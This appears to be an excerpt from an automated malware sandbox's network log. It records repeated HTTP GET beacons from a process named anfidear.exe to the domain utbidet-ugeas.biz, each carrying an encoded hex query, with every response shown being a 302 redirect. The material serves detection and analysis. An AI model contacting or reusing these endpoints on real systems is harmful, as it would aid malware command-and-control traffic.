                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    26192.168.2.1249770172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:32.195951939 CEST161OUTGET /d/N?022E5122542E5122541C510E542E5100083AB5E8C62E51147A1C7F1B661E610C54 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:32.698201895 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:32 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?022E5122542E5122541C510E542E5100083AB5E8C62E51147A1C7F1B661E610C54
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    27192.168.2.1249772172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:32.842693090 CEST161OUTGET /d/N?0228989BB528989BB51A98B7B52898B9E93C7C51272898AD9B1AB6A28718A8B5B5 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:33.326996088 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:33 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0228989BB528989BB51A98B7B52898B9E93C7C51272898AD9B1AB6A28718A8B5B5
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    28192.168.2.1249774172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:33.977814913 CEST161OUTGET /d/N?0279C68C0479C68C044BC6A00479C6AE586D22469679C6BA2A4BE8B53649F6A204 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:34.474129915 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:34 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0279C68C0479C68C044BC6A00479C6AE586D22469679C6BA2A4BE8B53649F6A204
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    29192.168.2.1249776172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:34.618578911 CEST161OUTGET /d/N?023489E2333489E2330689CE333489C06F206D28A13489D41D06A7DB0104B9CC33 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:35.290193081 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:35 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?023489E2333489E2330689CE333489C06F206D28A13489D41D06A7DB0104B9CC33
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    30192.168.2.1249779172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:38.259144068 CEST161OUTGET /d/N?02987A36F4987A36F4AA7A1AF4987A14A88C9EFC66987A00DAAA540FC6A84A18F4 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:38.751311064 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:38 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02987A36F4987A36F4AA7A1AF4987A14A88C9EFC66987A00DAAA540FC6A84A18F4
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    31192.168.2.1249781172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:42.381042957 CEST161OUTGET /d/N?0292A10D4092A10D40A0A1214092A12F1C8645C7D292A13B6EA08F3472A2912340 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:42.863408089 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:42 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0292A10D4092A10D40A0A1214092A12F1C8645C7D292A13B6EA08F3472A2912340
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    32192.168.2.1249783172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:43.014545918 CEST161OUTGET /d/N?02C283084CC283084CF083244CC2832A10D667C2DEC2833E62F0AD317EF2B3264C HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:43.498111963 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:43 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02C283084CC283084CF083244CC2832A10D667C2DEC2833E62F0AD317EF2B3264C
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    33192.168.2.1249785172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:43.859005928 CEST161OUTGET /d/N?02AA679484AA6794849867B884AA67B6D8BE835E16AA67A2AA9849ADB69A57BA84 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:44.369621992 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:44 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02AA679484AA6794849867B884AA67B6D8BE835E16AA67A2AA9849ADB69A57BA84
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    34192.168.2.1249787172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:45.251573086 CEST161OUTGET /d/N?0240CCC59F40CCC59F72CCE99F40CCE7C354280F0D40CCF3B172E2FCAD70FCEB9F HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:45.732397079 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:45 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0240CCC59F40CCC59F72CCE99F40CCE7C354280F0D40CCF3B172E2FCAD70FCEB9F
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    35192.168.2.1249790172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:47.569206953 CEST161OUTGET /d/N?0260CBB29260CBB29252CB9E9260CB90CE742F780060CB84BC52E58BA050FB9C92 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:48.051105976 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:47 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0260CBB29260CBB29252CB9E9260CB90CE742F780060CB84BC52E58BA050FB9C92
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    36192.168.2.1249792172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:48.200033903 CEST161OUTGET /d/N?0271C148E871C148E843C164E871C16AB46525827A71C17EC643EF71DA41F166E8 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:48.689898968 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:48 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0271C148E871C148E843C164E871C16AB46525827A71C17EC643EF71DA41F166E8
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    37192.168.2.1249794172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:49.436351061 CEST161OUTGET /d/N?02995F705F995F705FAB5F5C5F995F52038DBBBACD995F4671AB71496DA96F5E5F HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:49.937997103 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:49 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02995F705F995F705FAB5F5C5F995F52038DBBBACD995F4671AB71496DA96F5E5F
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    38192.168.2.1249796172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:50.498827934 CEST161OUTGET /d/N?028CE4BE0E8CE4BE0EBEE4920E8CE49C529800749C8CE48820BECA873CBCD4900E HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:50.983304977 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:50 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?028CE4BE0E8CE4BE0EBEE4920E8CE49C529800749C8CE48820BECA873CBCD4900E
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    39192.168.2.1249798172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:51.133968115 CEST161OUTGET /d/N?027EBABD187EBABD184CBA91187EBA9F446A5E778A7EBA8B364C94842A4E8A9318 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:51.606004953 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:51 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?027EBABD187EBABD184CBA91187EBA9F446A5E778A7EBA8B364C94842A4E8A9318
                                                                                                                                                                    Cache-Control: no-store, max-age=0
